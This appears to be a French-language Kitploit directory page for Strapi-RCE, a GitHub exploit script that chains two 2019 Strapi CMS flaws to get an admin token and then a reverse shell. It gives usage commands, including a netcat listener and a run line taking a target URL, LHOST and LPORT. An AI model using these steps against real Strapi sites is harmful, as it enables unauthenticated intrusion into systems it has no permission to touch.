Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Strapi-RCE — Script d'exploitation présentant une combinaison de CVE-2019-18818 et CVE-2019-19609 pour l'exécution de code à distance non authentifiée dans Strapi CMS. | Kitploit
Outils/GitHubGitHub/hackhoven/strapi-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et Éducation
GitHubhackhoven/strapi-rce

Strapi-RCE

Script d'exploitation présentant une combinaison de CVE-2019-18818 et CVE-2019-19609 pour l'exécution de code à distance non authentifiée dans Strapi CMS.

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Strapi-RCE

Script d'exploitation présentant une combinaison de CVE-2019-18818 et CVE-2019-19609 pour une exécution de code à distance non authentifiée dans Strapi CMS.

Exploit

Ce script exploite une vulnérabilité dans Strapi CMS versions 3.0.0-beta.17.4 et antérieures, permettant une exécution de code à distance non authentifiée.

Description

L'exploitation fonctionne d'abord en tirant parti d'une vulnérabilité de réinitialisation de mot de passe pour obtenir un JSON Web Token (JWT) pour un utilisateur administratif. Ce jeton est ensuite utilisé pour envoyer une charge utile malveillante au Strapi CMS, ce qui déclenche un shell inverse vers la machine de l'attaquant.

Comment l'utiliser

  1. Cloner le dépôt :

    root@kitploit:~
    git clone https://github.com/Hackhoven/Strapi-RCE.git
    
  2. Se rendre dans le répertoire

    root@kitploit:~
    cd Strapi-RCE/
    
  3. Mettre en place un listener Netcat

    root@kitploit:~
    nc -nlvp <LPORT>
    
  • Exécuter le script avec l'URL cible, l'adresse IP de l'hôte local et le port de l'hôte local comme arguments

    root@kitploit:~
    python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
    
  • Avertissement

    Ce script est destiné uniquement à des fins éducatives. L'auteur n'approuve ni ne soutient l'utilisation de ce script pour des activités illégales ou contraires à l'éthique. Ce script doit être utilisé uniquement dans le cadre de recherches en sécurité légales ou d'environnements CTF. Utilisation à vos propres risques.


    Réalisé par Hackhoven

    Télécharger l’outil